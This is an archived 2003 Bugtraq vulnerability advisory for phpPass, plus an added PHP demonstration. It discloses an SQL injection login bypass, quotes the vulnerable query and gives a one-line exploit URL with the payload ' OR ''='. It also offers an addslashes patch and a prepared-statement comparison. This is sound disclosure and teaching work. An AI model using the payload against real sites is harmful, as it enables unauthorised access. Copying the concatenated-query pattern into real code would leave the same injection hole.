Bugtraq mailing list archives
phpPass (PHP)
From: "Frog Man" <leseulfrog () hotmail com>
Date: Mon, 13 Jan 2003 11:34:27 +0100
Information :
°°°°°°°°°°°°°°
Version : 2
Website : http://www.agames-net.com
Problem : SQL Injection

PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
accesscontrol.php :
------------------------------------------------
[...]
session_register("uid");
session_register("pwd");
[...]
$sql = "SELECT * FROM user WHERE userid = '$uid' AND password = '$pwd'";
$result = mysql_query($sql);
[...]
if (mysql_num_rows($result) == 0) {
  session_unregister("uid");
  session_unregister("pwd");
  ?>
  <html>
  <head>
  <title> Access Denied </title>
  [...]
  exit;
[...]
------------------------------------------------

Exploit :
°°°°°°°°°
http://[target]/protectedpage.php?uid='%20OR%20''='&pwd='%20OR%20''='

Patch :
°°°°°°°
In accesscontrol.php, replace the lines :
-------------------------------------------------
$sql = "SELECT * FROM user WHERE userid = '$uid' AND password = '$pwd'";
$result = mysql_query($sql);
------------------------------------------------
by :
------------------------------------------------------------------------
$uid=addslashes($uid);
$pwd=addslashes($pwd);
$sql = "SELECT * FROM user WHERE userid = '$uid' AND password = '$pwd'";
$result = mysql_query($sql);
------------------------------------------------------------------------

A patch can be found on http://www.phpsecure.org .

More details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/phpPass.txt
translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FphpPass.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools

frog-m@n
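Added example, not part of the original post or of phpPass: the query pattern from accesscontrol.php next to a prepared-statement version of the same check, run against the uid/pwd values from the advisory's URL. The in-memory SQLite table (through PDO with the pdo_sqlite extension), the function names and the sample account are assumptions made for the illustration.

```php
<?php
// Added illustration, not phpPass code. The table and the sample account are
// constructed; the plaintext password column only mirrors the advisory's query.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE user (userid TEXT PRIMARY KEY, password TEXT)");
$db->exec("INSERT INTO user VALUES ('alice', 'correct horse')");

// The pattern from accesscontrol.php: request values pasted into the SQL text,
// so a quote in the input changes the structure of the WHERE clause.
function check_concat(PDO $db, string $uid, string $pwd): bool
{
    $sql = "SELECT * FROM user WHERE userid = '$uid' AND password = '$pwd'";
    return $db->query($sql)->fetch() !== false;
}

// Same check with a prepared statement: the SQL text is fixed and the values
// are bound as data, so they are never parsed as SQL.
function check_prepared(PDO $db, string $uid, string $pwd): bool
{
    $stmt = $db->prepare(
        'SELECT 1 FROM user WHERE userid = :uid AND password = :pwd'
    );
    $stmt->execute([':uid' => $uid, ':pwd' => $pwd]);
    return $stmt->fetch() !== false;
}

// URL-decoded form of the uid and pwd values in the advisory's URL.
$quoted = "' OR ''='";

$cases = [
    'valid login'      => ['alice', 'correct horse'],
    'wrong password'   => ['alice', 'nope'],
    'advisory payload' => [$quoted, $quoted],
];

foreach ($cases as $label => [$uid, $pwd]) {
    printf(
        "%-17s concat=%-5s prepared=%s\n",
        $label,
        var_export(check_concat($db, $uid, $pwd), true),
        var_export(check_prepared($db, $uid, $pwd), true)
    );
}
```

Only the concatenated query accepts the advisory's values; the prepared statement looks for a user literally named `' OR ''='` and finds none.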